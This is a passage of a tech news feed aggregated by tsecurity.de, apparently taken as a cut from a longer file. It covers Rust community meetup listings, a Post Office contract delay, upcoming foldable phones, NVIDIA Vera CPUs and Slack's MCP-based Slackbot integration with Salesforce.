<li>2026-07-08 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a></li>
<li><a href="https://luma.com/jv9lom12"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
<li>2026-07-09 | Virtual (Nürnberg, DE) | <a href="https://www.meetup.com/rust-noris/events/">Rust Nuremberg</a></li>
<li><a href="https://www.meetup.com/rust-noris/events/315517604/"><strong>Rust Nürnberg online</strong></a></li>
<li>2026-07-14 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a></li>
<li><a href="https://www.meetup.com/dallasrust/events/310254778/"><strong>Second Tuesday</strong></a></li>
<li>2026-07-15 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a></li>
<li><a href="https://luma.com/21k797xr"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
<li>2026-07-15 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a></li>
<li><a href="https://www.meetup.com/vancouver-rust/events/314233743/"><strong>Jiff</strong></a></li>
<li>2026-07-16 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a></li>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314520812/"><strong>July, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
<li>2026-07-16 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a></li>
<li><a href="https://www.meetup.com/rust-berlin/events/312045926/"><strong>Rust Hack and Learn</strong></a></li>
<li>2026-07-19 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a></li>
<li><a href="https://www.meetup.com/dallasrust/events/314329045/"><strong>Rust Deep Learning: Third Sunday</strong></a></li>
<li>2026-07-21 | Virtual (London, UK) | <a href="https://www.meetup.com/women-in-rust">Women in Rust</a></li>
<li><a href="https://www.meetup.com/women-in-rust/events/315102297/"><strong>Lunch &amp; Learn: Learning Rust as First Programming Language</strong></a></li>
<li>2026-07-21 | Virtual (Washington, DC, US) | <a href="https://www.meetup.com/rustdc">Rust DC</a></li>
<li><a href="https://www.meetup.com/rustdc/events/315279653/"><strong>Mid-month Rustful</strong></a></li>
<li>2026-07-22 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a></li>
<li><a href="https://luma.com/hd8mlw56"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
<li>2026-07-28 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a></li>
<li><a href="https://www.meetup.com/dallasrust/events/310254777/"><strong>Fourth Tuesday</strong></a></li>
<li>2026-07-29 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a></li>
<li><a href="https://luma.com/uo5ek1f4"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
<li>2026-07-30 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin/events/">Rust Berlin</a></li>
<li><a href="https://www.meetup.com/rust-berlin/events/312045928/"><strong>Rust Hack and Learn</strong></a></li>
<li>2026-08-02 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust/events/">Dallas Rust User Meetup</a></li>
<li><a href="https://www.meetup.com/dallasrust/events/314095294/"><strong>Rust Deep Learning: First Sunday</strong></a></li>
<li>2026-08-04 | Virtual (London, GB) | <a href="https://www.meetup.com/women-in-rust/events/">Women in Rust</a></li>
<li><a href="https://www.meetup.com/women-in-rust/events/315213885/"><strong>👋 Community Catch Up</strong></a></li>
<li>2026-07-29 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a></li>
<li><a href="https://luma.com/ii2jrwva"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
<li>2026-08-05 | Virtual (Indianapolis, IN, US) | <a href="https://www.meetup.com/indyrs/events/">Indy Rust</a></li>
<li><a href="https://www.meetup.com/indyrs/events/315210367/"><strong>Indy.rs - with Social Distancing</strong></a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#asia">Asia</a></h5>
<ul>
<li>2026-07-18 | Bangalore, IN | <a href="https://hasgeek.com/rustbangalore">Rust Bangalore</a></li>
<li><a href="https://hasgeek.com/rustbangalore/july-2026-rustacean-meetup/"><strong>July 2026 Rustacean Meetup</strong></a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#africa">Africa:</a></h5>
<ul>
<li>2026-07-14 | Johannesburg, ZA | <a href="https://www.meetup.com/johannesburg-rust-meetup/events/">Johannesburg Rust Meetup</a></li>
<li><a href="https://www.meetup.com/johannesburg-rust-meetup/events/315573758/"><strong>Debugging a production grade Open Source Rust crate</strong></a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#europe">Europe</a></h5>
<ul>
<li>2026-07-08 | Dublin, IE | <a href="https://www.meetup.com/rust-dublin">Rust Dublin</a></li>
<li><a href="https://www.meetup.com/rust-dublin/events/315150327/"><strong>Join us live and INPERSON for Rust 262</strong></a></li>
<li>2026-07-09 | Berlin, DE | <a href="https://www.meetup.com/rust-berlin/events/">Rust Berlin</a></li>
<li><a href="https://www.meetup.com/rust-berlin/events/315585121/"><strong>Rust Berlin on location 🏳️‍🌈 - Edition 015</strong></a></li>
<li>2026-07-09 | Frankfurt, DE | <a href="https://www.meetup.com/rust-rhein-main/events/">Rust Rhein-Main</a></li>
<li><a href="https://www.meetup.com/rust-rhein-main/events/315366165/"><strong>Building Cross Platform Applications with Ply</strong></a></li>
<li>2026-07-09 | Switzerland, CH | <a href="https://www.posttenebraslab.ch/wiki/events/start">PostTenebrasLab</a></li>
<li><a href="https://www.posttenebraslab.ch/wiki/events/monthly_meeting/rust_meetup"><strong>Rust Meetup Geneva</strong></a></li>
<li>2026-07-15 | Dortmund, DE | <a href="https://www.meetup.com/rust-dortmund/events/">Rust Dortmund</a></li>
<li><a href="https://www.meetup.com/rust-dortmund/events/315496876/"><strong>Teach and Hack at Projektspeicher</strong></a></li>
<li>2026-07-21 | Leipzig, DE | <a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig">Rust - Modern Systems Programming in Leipzig</a></li>
<li><a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig/events/313816470/"><strong>Supercharge Rust funcs with implicit arguments and context-generic programming</strong></a></li>
<li>2026-07-23 | Berlin, DE | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a></li>
<li><a href="https://www.meetup.com/rust-berlin/events/315484101/"><strong>Rust Berlin Talks: The next generation</strong></a></li>
<li>2026-07-23 | London, UK | <a href="https://www.meetup.com/london-rust-project-group">London Rust Project Group</a></li>
<li><a href="https://www.meetup.com/london-rust-project-group/events/315366453/"><strong>Rama modular service framework for Rust</strong></a></li>
<li>2026-07-23 | Paris, FR | <a href="https://www.meetup.com/rust-paris">Rust Paris</a></li>
<li><a href="https://www.meetup.com/rust-paris/events/315309633/"><strong>Rust meetup #87</strong></a></li>
<li>2026-07-30 | Manchester, GB | <a href="https://www.meetup.com/rust-manchester/events/">Rust Manchester</a></li>
<li><a href="https://www.meetup.com/rust-manchester/events/315037685/"><strong>Rust Manchester July Code Night</strong></a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#north-america">North America</a></h5>
<ul>
<li>2026-07-09 | Lehi, UT, US | <a href="https://www.meetup.com/utah-rust">Utah Rust</a></li>
<li><a href="https://www.meetup.com/utah-rust/events/314696647/"><strong>Utah Rust July Meetup</strong></a></li>
<li>2026-07-09 | Mountain View, CA, US | <a href="https://www.meetup.com/hackerdojo/events/">Hacker Dojo</a></li>
<li><a href="https://www.meetup.com/hackerdojo/events/315338107/"><strong>RUST MEETUP at HACKER DOJO</strong></a></li>
<li>2026-07-11 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a></li>
<li><a href="https://www.meetup.com/bostonrust/events/315225865/"><strong>MIT Rust Lunch, July 11</strong></a></li>
<li>2026-07-15 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a></li>
<li><a href="https://www.meetup.com/vancouver-rust/events/314233743/"><strong>Jiff</strong></a></li>
<li>2026-07-16 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a></li>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314520812/"><strong>July, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
<li>2026-07-18 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a></li>
<li><a href="https://www.meetup.com/bostonrust/events/315225872/"><strong>North End Rust Lunch, July 18</strong></a></li>
<li>2026-07-21 | San Francisco, CA, US | <a href="https://www.meetup.com/san-francisco-rust-study-group">San Francisco Rust Study Group</a></li>
<li><a href="https://www.meetup.com/san-francisco-rust-study-group/events/314997214/"><strong>Rust Hacking in Person</strong></a></li>
<li>2026-07-22 | Austin, TX, US | <a href="https://www.meetup.com/rust-atx">Rust ATX</a></li>
<li><a href="https://www.meetup.com/rust-atx/events/xvkdgtyjckbdc/"><strong>Rust Lunch - Fareground</strong></a></li>
<li>2026-07-22 | Los Angeles, CA, US | <a href="https://www.meetup.com/rust-los-angeles">Rust Los Angeles</a></li>
<li><a href="https://www.meetup.com/rust-los-angeles/events/315376271/"><strong>Rust LA: Rust in Distributed Systems with Flight Science!</strong></a></li>
<li>2026-07-25 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust/events/">Boston Rust Meetup</a></li>
<li><a href="https://www.meetup.com/bostonrust/events/315582650/"><strong>Porter Square Rust Lunch, July 25</strong></a></li>
<li>2026-07-25 | Brooklyn, NY, US | <a href="https://flowercomputer.com/">Flower</a></li>
<li><a href="https://partiful.com/e/Vq9fyDNCMSO7ia4ulK5b"><strong>BOG-A-THON 2</strong></a></li>
<li>2026-07-30 | Atlanta, GA, US | <a href="https://www.meetup.com/rust-atl/events/">Rust Atlanta</a></li>
<li><a href="https://www.meetup.com/rust-atl/events/313539329/"><strong>Rust-Atl</strong></a></li>
<li>2026-08-01 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust/events/">Boston Rust Meetup</a></li>
<li><a href="https://www.meetup.com/bostonrust/events/315582653/"><strong>Chinatown Rust Lunch, Aug 1</strong></a></li>
<li>2026-08-04 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust/events/">Boston Rust Meetup</a></li>
<li><a href="https://www.meetup.com/bostonrust/events/314660176/"><strong>Evening Boston Rust Meetup at Red Hat, Aug 4</strong></a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#oceania">Oceania</a></h5>
<ul>
<li>2026-07-09 | Brisbane City, QL, AU | <a href="https://www.meetup.com/rust-brisbane/events/">Rust Brisbane</a></li>
<li><a href="https://www.meetup.com/rust-brisbane/events/315563251/"><strong>Rust Brisbane • July 2026</strong></a></li>
<li>2026-07-21 | Barton, AU | <a href="https://www.meetup.com/rust-canberra">Canberra Rust User Group</a></li>
<li><a href="https://www.meetup.com/rust-canberra/events/315307280/"><strong>July Meetup</strong></a></li>
<li>2026-07-23 | Perth, AU | <a href="https://www.meetup.com/perth-rust-meetup-group">Rust Perth Meetup Group</a></li>
<li><a href="https://www.meetup.com/perth-rust-meetup-group/events/315451138/"><strong>Rust Perth: July Meetup!</strong></a></li>
<li>2026-07-30 | Melbourne, AU | <a href="https://www.meetup.com/rust-melbourne/events/">Rust Melbourne</a></li>
<li><a href="https://www.meetup.com/rust-melbourne/events/315039480/"><strong>Rust Melbourne July 2026</strong></a></li>
</ul>
<p>If you are running a Rust event please add it to the <a href="https://www.google.com/calendar/embed?src=apd9vmbc22egenmtu5l6c5jbfc%40group.calendar.google.com">calendar</a> to get
it mentioned here. Please remember to add a link to the event too.
Email the <a href="mailto:community-team@rust-lang.org">Rust Community Team</a> for access.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#jobs">Jobs</a></h4>
<p>Please see the latest <a href="https://www.reddit.com/r/rust/comments/1ttbtf5/official_rrust_whos_hiring_thread_for_jobseekers/">Who's Hiring thread on r/rust</a></p>
<h3><a class="toclink" href="https://this-week-in-rust.org/atom.xml#quote-of-the-week">Quote of the Week</a></h3>
<blockquote>
<p>if a ptr is dereferenced in a forest and nobody hears it, is it sound?</p>
</blockquote>
<p>– <a href="https://users.rust-lang.org/t/does-the-indirection-of-a-pointer-immediately-create-a-reference/141071/10">Kornel on rust-users</a></p>
<p>Thanks to <a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328/1785">Cerber-Ursi</a> for the suggestion!</p>
<p><a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328">Please submit quotes and vote for next week!</a></p>
<p>This Week in Rust is edited by:</p>
<ul>
<li><a href="https://github.com/nellshamrell">nellshamrell</a></li>
<li><a href="https://github.com/llogiq">llogiq</a></li>
<li><a href="https://github.com/ericseppanen">ericseppanen</a></li>
<li><a href="https://github.com/extrawurst">extrawurst</a></li>
<li><a href="https://github.com/U007D">U007D</a></li>
<li><a href="https://github.com/mariannegoldin">mariannegoldin</a></li>
<li><a href="https://github.com/bdillo">bdillo</a></li>
<li><a href="https://github.com/opeolluwa">opeolluwa</a></li>
<li><a href="https://github.com/bnchi">bnchi</a></li>
<li><a href="https://github.com/KannanPalani57">KannanPalani57</a></li>
<li><a href="https://github.com/tzilist">tzilist</a></li>
</ul>
<p><em>Email list hosting is sponsored by <a href="https://foundation.rust-lang.org/">The Rust Foundation</a></em></p>
<p><small><a href="https://www.reddit.com/r/rust/comments/1ureq0r/this_week_in_rust_659/">Discuss on r/rust</a></small></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Post Office Horizon replacement contract delayed further]]></title>
<description><![CDATA[The Post Office has once more extended the standstill period before putting pen-to-paper on new EPOS system]]></description>
<link>https://tsecurity.de/de/3655249/it-nachrichten/post-office-horizon-replacement-contract-delayed-further/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655249/it-nachrichten/post-office-horizon-replacement-contract-delayed-further/</guid>
<pubDate>Wed, 08 Jul 2026 21:02:40 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Post Office has once more extended the standstill period before putting pen-to-paper on new EPOS system]]></content:encoded>
</item>
<item>
<title><![CDATA[The $2,000 club: Apple, Samsung, Google bet on foldables]]></title>
<description><![CDATA[Apple, Samsung, and Google are all expected to introduce their takes on folding smartphones in the coming weeks. 



All three competitors work together on some things; Samsung allegedly makes displays for iPhone; Google makes an OS for Samsung; and Apple works with Google Gemini for AI. That pro...]]></description>
<link>https://tsecurity.de/de/3654849/it-nachrichten/the-2000-club-apple-samsung-google-bet-on-foldables/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654849/it-nachrichten/the-2000-club-apple-samsung-google-bet-on-foldables/</guid>
<pubDate>Wed, 08 Jul 2026 18:19:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Apple, Samsung, and Google are all expected to introduce their takes on folding smartphones in the coming weeks. </p>



<p>All three competitors work together on some things; Samsung allegedly makes displays for iPhone; Google makes an OS for Samsung; and Apple works with Google Gemini for AI. That proximity suggests that we might experience some synchronicity between these devices when they finally arrive.</p>



<h2 class="wp-block-heading"><strong>Samsung and Google move first — but September belongs to Apple</strong></h2>



<p><em><a href="https://www.bloomberg.com/news/articles/2026-07-07/samsung-to-get-jump-on-apple-s-first-foldable-launch-with-galaxy-fold-8-july-22" target="_blank" rel="noreferrer noopener">Bloomberg</a></em> agrees: the publication claims Samsung’s forthcoming Galaxy Unpacked event in London on July 22 will feature the Galaxy Z Fold 8, which will have a short, wide design “that resembles Apple Inc.’s planned folding iPhone.”</p>



<p>It is <a href="https://tech.sportskeeda.com/mobiles/galaxy-z-fold-8-series-prices-leaked-here-s-much-cost" target="_blank" rel="noreferrer noopener">expected to cost around $1,999</a> for the 256GB model. The late July introduction is widely seen as an attempt to steal a little thunder from the upcoming launch of the iPhone Fold/Ultra, Apple’s first foldable device.</p>



<p>Google is also chasing the looming Apple thundercloud with its own “<a href="https://arstechnica.com/gadgets/2026/07/googles-pixel-11-launch-event-is-set-for-august-12-with-possible-price-increases/" target="_blank" rel="noreferrer noopener">Made by Google</a>” event in New York on Aug. 12. This is expected to be a Pixel family update, likely including a successor to the Pixel 11 Pro Fold. Leaks suggest these devices will have more RAM (for AI), more storage — with a 256GB minimum — and be priced at an <a href="https://www.androidauthority.com/google-pixel-11-storage-colors-price-leak-3684868/" target="_blank" rel="noreferrer noopener">estimated $1,999</a> – or <a href="https://9to5google.com/2026/07/07/pixel-11-price-128gb-release-date-leak/" target="_blank" rel="noreferrer noopener">maybe even more</a>.</p>



<p>Both of these devices will be great. Both will likely be compelling; but what we don’t know yet is how the decade or so Apple has spent designing and developing its own folding smartphones will crystallize into the final result. </p>



<h2 class="wp-block-heading"><strong>A decade in development, but will it blend?</strong></h2>



<p>Apple has its reputation on the line – will its phone stand out for its combination of high-tech and high design, or will the company fail in its bid to stand apart? We’ll find out in September when Apple’s folding smartphone finally appears, and the oxygen once again starts circulating around this part of the room.</p>



<p>We do know that the iPhone Ultra has entered mass production, with <em><a href="https://www.macrumors.com/2026/07/08/foldable-iphone-ultra-mass-production-no-delay/" target="_blank" rel="noreferrer noopener">MacRumors</a></em> seemingly rebutting <a href="https://www.computerworld.com/article/4193280/forget-the-hype-iphone-ultra-scarcity-will-tell-the-story.html">recent claims by Ming-Chi Kuo</a> that the device might ship later than expected and be in <a href="https://www.computerworld.com/article/4193280/forget-the-hype-iphone-ultra-scarcity-will-tell-the-story.html">short supply once it appears</a>. Citing Chinese supply chain sources, the report says manufacturing has begun. Other reports indicate Apple has <a href="https://www.applemust.com/apple-to-sell-10m-iphone-ultra-grab-29-share/" target="_blank" rel="noreferrer noopener">increased initial manufacturing orders</a> to 10 million units. Somewhere in between the truth lies.</p>



<p>The iPhone Ultra is <a href="https://www.applemust.com/what-we-think-we-know-about-iphone-ultra/" target="_blank" rel="noreferrer noopener">expected to be a book-style foldable</a> with a 7.8-in. inner display and a 5.5-in. cover display, Touch ID, an Apple C2 modem and an A20 processor. It will run iOS 27, which has already been found to be capable of changing display layout and resolution to seamlessly switch between different views; moving from the outer to the inner display should seem almost instantaneous, with smooth transitions between both states. </p>



<h2 class="wp-block-heading"><strong>The hinges need to do the talking</strong></h2>



<p>Apple has paid particular attention to the hinge design, which is thought to be near invisible to the eye and extremely robust. (It needs to be robust; the hinge will inevitably be put to some very tough tests by hungry vlogging tech influencers everywhere.)</p>



<p>Those same influencers will also be putting Siri AI to the test, with most potential customers very curious about the extent to which Apple Intelligence can turn the folding iPhone into a viable replacement for Macs or iPads. What happens when you use an iPhone Ultra with an external mouse and keyboard, for example? Will competing devices match the user experience for productive tasks?</p>



<p>At $2,000 a pop, a lot of potential customers for any of these foldable devices will be looking for a solution that ticks more boxes than simply being a giant smartphone. They will certainly want the luxury finish we can expect in all three devices, but they will also be hoping for a tool fit for a range of use cases smartphones don’t generally meet. </p>



<p>Samsung’s existing Fold range, for example, is celebrated for its advanced multitasking features and media content and consumption features, even as its ability to connect to a monitor, keyboard, and mouse (<a href="https://www.samsung.com/us/support/owners/app/samsung-dex" target="_blank" rel="noreferrer noopener">Samsung DeX</a>) makes it a convenient PC replacement.</p>



<h2 class="wp-block-heading"><strong>Resetting the high-end smartphone price point</strong></h2>



<p>You can expect much the same from all three devices: a focus on display resolution, color gamut, brightness and screen refresh rates. But for all three, the really critical point will be the resilience of the hinge. Because once the novelty of the fold fades, the winner will be the one that succeeds in becoming something more useful than the smartphone we already know. </p>



<p>In the end, these things must deliver more, not less, if they are to persuade consumers to reset their price-driven comfort zones. All of the manufacturers have a <a href="https://www.applemust.com/ram-ageddon-continues-samsung-eyes-another-20-dram-hike/" target="_blank" rel="noreferrer noopener">vested interest</a> in driving shoppers to spend even more money on their devices. </p>



<p><em>Join me on social media at </em><a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener"><em>BlueSky</em></a><em>,  </em><a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener"><em>LinkedIn</em></a><em>, or </em><a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener"><em>Mastodon</em></a><em>,and do please subscribe to </em><a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener"><em>The Core</em></a><em> for your daily collection of human-curated Apple News lovingly assembled by yours truly.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[NVIDIA Vera CPU Demand Rises as Perplexity Backs Its AI Inference Performance]]></title>
<description><![CDATA[NVIDIA Vera CPU demand is rising as more AI firms look for faster processors built for inference and agentic AI workloads, with Perplexity now joining…
The post NVIDIA Vera CPU Demand Rises as Perplexity Backs Its AI Inference Performance appeared first on OnMSFT.]]></description>
<link>https://tsecurity.de/de/3654606/windows-tipps/nvidia-vera-cpu-demand-rises-as-perplexity-backs-its-ai-inference-performance/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654606/windows-tipps/nvidia-vera-cpu-demand-rises-as-perplexity-backs-its-ai-inference-performance/</guid>
<pubDate>Wed, 08 Jul 2026 16:27:00 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>NVIDIA Vera CPU demand is rising as more AI firms look for faster processors built for inference and agentic AI workloads, with Perplexity now joining…</p>
<p>The post <a href="https://onmsft.com/news/nvidia-vera-cpu-demand-rises-as-perplexity-backs-its-ai-inference-performance/">NVIDIA Vera CPU Demand Rises as Perplexity Backs Its AI Inference Performance</a> appeared first on <a href="https://onmsft.com/">OnMSFT</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Slack’s Slackbot can now pull your CRM data, generate charts, and send DocuSigns — all from a chat message.]]></title>
<description><![CDATA[Five years and $27.7 billion after Salesforce acquired Slack, the two products are finally starting to function as a single system. On Tuesday, Slack launched an integration that connects Slackbot — the personal AI agent built into every workspace — to the entire Salesforce platform, including CR...]]></description>
<link>https://tsecurity.de/de/3654241/it-nachrichten/slacks-slackbot-can-now-pull-your-crm-data-generate-charts-and-send-docusigns-all-from-a-chat-message/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654241/it-nachrichten/slacks-slackbot-can-now-pull-your-crm-data-generate-charts-and-send-docusigns-all-from-a-chat-message/</guid>
<pubDate>Wed, 08 Jul 2026 14:18:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Five years and $27.7 billion after Salesforce acquired Slack, the two products are finally starting to function as a single system. On Tuesday, <a href="https://slack.com/">Slack</a> launched an integration that connects <a href="https://slack.com/features/slackbot">Slackbot</a> — the personal AI agent built into every workspace — to the entire Salesforce platform, including CRM data, Tableau analytics, Data 360 customer profiles, and a growing constellation of third-party applications, all through a single conversational prompt.</p><p>The mechanism behind the expansion is a set of dedicated <a href="https://modelcontextprotocol.io/docs/getting-started/intro">Model Context Protocol (MCP)</a> servers from Salesforce that connect Slackbot to the company's <a href="https://venturebeat.com/technology/salesforce-launches-headless-360-to-turn-its-entire-platform-into-infrastructure-for-ai-agents">Headless 360 infrastructure</a>. In practical terms, a salesperson can now ask Slackbot for a customer's deal history, receive a live Tableau visualization of pipeline trends, update a CRM record, and trigger a DocuSign approval — without ever switching tabs or logging into another application. According to Slack, the Salesforce IT team has already used this architecture to save its 1,500-plus engineers "thousands of custom coding hours annually."</p><p>The timing is not accidental. Slack is making this move amid escalating competitive pressure from Microsoft Teams, which claims <a href="https://techcommunity.microsoft.com/discussions/microsoftteams/teams-grows-to-320-million-monthly-active-users/3964746">320 million-plus monthly active users</a> and has Copilot embedded across the Office suite, and from Google, which continues to weave <a href="https://www.computerworld.com/article/4143838/google-embeds-gemini-ai-deeper-into-workspace-apps.html">Gemini deeper into Workspace</a>. And just days ago, The Information reported that some smaller companies are using Anthropic's Claude to r<a href="https://www.theinformation.com/articles/small-firms-use-claude-quit-salesforce">eplace Salesforce CRM entirely</a> — one Atlanta-based property management firm with about 55 employees reportedly saved around $100,000 annually by building a custom replacement using Claude Code and Replit.</p><p>Against that backdrop, Slack CMO Ryan Gavin sat down for an exclusive interview with VentureBeat to frame the announcement and argue that the company's future depends on an idea he calls "multiplayer AI" — and that the 25 years of customer data locked inside Salesforce is an asset no vibe-coded alternative can replicate.</p><h2><b>Why Slack's CMO believes 'multiplayer AI' is the next big enterprise battleground</b></h2><p>Gavin's core argument is that the enterprise AI conversation has been stuck in single-player mode for too long, and that Slack is uniquely positioned to break it open.</p><p>"So much of what we've seen are just these incredible tools that have largely been single-player, incredible tools for individual productivity, helping people complete tasks and write code," Gavin told VentureBeat. "But as we've always known at Slack ever since our inception, work is a team sport. For AI to really take hold in the enterprise, it has to be multiplayer."</p><p>The distinction matters commercially. Most AI assistants today — ChatGPT, Claude, Copilot — default to one-on-one conversations with a single user. A researcher queries a model, gets a response, and acts on it alone. The insight stays in a private chat window, invisible to colleagues. Gavin argues this creates a new version of the tab-switching problem that plagued pre-AI enterprise software, except now employees are also navigating dozens of individual agent interfaces on top of their existing applications.</p><p>"It's going to benefit almost no one if every enterprise application out there spawns hundreds of agent babies, and employees end up in a worse world than they were before," Gavin said.</p><p>Slack's answer is to make <a href="https://slack.com/features/slackbot">Slackbot</a> the orchestration layer. Because everything happens in shared channels, any action an agent takes — pulling a customer profile, flagging a deal risk, updating a Jira ticket — is visible to the entire team. A colleague can redirect, build on, or correct the agent's work in real time.</p><h2><b>How MCP and Salesforce's headless 360 platform power Slackbot's new capabilities</b></h2><p>The technical backbone of the announcement is the <a href="https://modelcontextprotocol.io/docs/getting-started/intro">Model Context Protocol</a>, an open standard originally developed by Anthropic that defines how AI models discover and invoke external tools. MCP has seen rapid adoption across the AI tooling ecosystem. By early 2026, it had been adopted by <a href="https://claude.com/product/claude-code">Claude Code</a>, <a href="https://cursor.com/">Cursor</a>, <a href="https://github.com/features/copilot">GitHub Copilot</a>, and OpenAI's tooling, with managed hosting available from <a href="https://aws.amazon.com/">AWS</a>, <a href="https://www.cloudflare.com/">Cloudflare</a>, and <a href="https://vercel.com/">Vercel</a>. As a <a href="https://dev.to/swrly/model-context-protocol-mcp-explained-why-it-matters-in-2026-1c7i">DEV Community explainer</a> puts it, MCP "is the closest thing the AI tooling ecosystem has to a standard."</p><p>In this implementation, Salesforce exposes its platform capabilities — CRM records, Tableau visualizations, Data 360 customer profiles, Agentforce agents — as MCP servers. Slackbot operates as an MCP client, connecting to those servers and routing user queries to the appropriate back-end system. When a user asks Slackbot about a customer, the bot discovers which MCP tools are relevant, calls them, and synthesizes the results into a single response — all within the Slack conversation.</p><p>Gavin explained the architecture in simple terms: "Salesforce is extending what has always been our open platform through our Headless 360 strategy — making all of these MCP endpoints available. And then Slackbot acts as an MCP client, connecting to those MCP servers and bringing all that data in within the confines of a trusted permission platform."</p><p>That permission layer is critical. Slackbot respects each user's Salesforce permissions, meaning a marketing coordinator cannot accidentally access sales pipeline data they are not authorized to see. Validation rules, field-level security, and org-wide data boundary configurations carry over automatically. For admins, setup requires no custom integration code — Salesforce MCP servers can be discovered, installed, and governed from a single UI using the existing Slack-Salesforce connection.</p><p>Salesforce first introduced the <a href="https://venturebeat.com/technology/salesforce-launches-headless-360-to-turn-its-entire-platform-into-infrastructure-for-ai-agents">Headless 360</a> concept at its <a href="https://www.salesforce.com/tdx/">TDX developer conference</a> in April, positioning it as an API-driven layer that exposes the platform's data, workflows, and governance controls so that software agents, rather than human users, can execute business processes directly. As <a href="http://cio.com/">CIO.com reported</a> at the time, analysts viewed the move as an effort by Salesforce "to position itself as a central layer for managing agent-driven operations across different business functions."</p><h2><b>Slack says it's betting on openness, not on any single AI protocol</b></h2><p>When asked whether Slack is making a risky bet on MCP as a protocol — given that standards in AI tooling can shift rapidly — Gavin reframed the question entirely.</p><p>"We're not betting on MCP, per se. We're betting on what we've always bet on, which is that Slack is an open platform," Gavin told VentureBeat. "MCP happens to be the best agent-to-agent protocol that the industry is rallying around right now, but if something better came out tomorrow, you'd see the same pattern from Slack — we're going to stay open. MCP and APIs are simply tools that facilitate that."</p><p>That open-platform philosophy is central to Slack's identity and, Gavin argues, its competitive differentiation. Slack already hosts <a href="https://slack.com/resources/why-use-slack/what-is-slack-and-how-does-it-work">more than 2,600 app integrations</a>. The new MCP-native partner ecosystem includes <a href="https://www.atlassian.com/">Atlassian</a>, <a href="https://www.box.com/home">Box</a>, <a href="https://www.docusign.com/">DocuSign</a>, <a href="https://www.canva.com/">Canva</a>, <a href="https://lucid.co/">Lucid</a>, <a href="https://www.zoom.com/">Zoom</a>, and more than 25 additional companies, each of whose agents can be added directly to shared Slack channels. <a href="https://www.mulesoft.com/">MuleSoft Agent</a>, now connected to Slackbot, helps manage integrations for the team — checking system health or surfacing critical error alerts in the same workspace where the team is already collaborating.</p><p>But MCP is not without trade-offs. The protocol requires tool discovery on every connection, and large tool libraries can consume significant context tokens. One technical analysis noted that a server exposing 300 tools could cost 5,000 to 10,000 tokens per session before the model does any useful work. For an enterprise like Salesforce with hundreds of potential tools across CRM, analytics, and service platforms, careful filtering and segmentation of 